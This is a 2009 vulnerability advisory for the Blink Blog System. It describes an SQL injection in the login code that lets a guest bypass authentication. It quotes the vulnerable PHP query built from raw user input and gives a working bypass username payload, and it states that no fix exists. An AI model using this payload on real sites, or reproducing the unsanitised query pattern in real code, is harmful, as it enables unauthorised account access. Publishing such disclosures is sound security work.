******** Salvatore "drosophila" Fresta ********
[+] Application: Blink Blog System
[+] Version: Unknown
[+] Website: http://blogink.sourceforge.net
[+] Bugs: [A] Authentication Bypass
[+] Exploitation: Remote
[+] Date: 03 Aug 2009
[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com
***************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
***************************************************
[+] Bugs
There are many SQL Injection flaws but I post the
only one that allows a guest to bypass the login.
- [A] Authentication Bypass
[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: login.php, db.php
This bug allows a guest to bypass the login.
login.php:
...
$username = $_POST["nick"];
$password = md5($_POST["password"]);
if ($data = $DB->usercheck($username, $password))
...
db.php:
function usercheck($username, $password)
{
$try = mysql_query("SELECT * FROM users WHERE nick=\"".$username."\" AND password=\"".$password."\" ");
...
***************************************************
[+] Code
- [A] Authentication Bypass
username: root"#
password: foo
***************************************************
[+] Fix
No fix.
***************************************************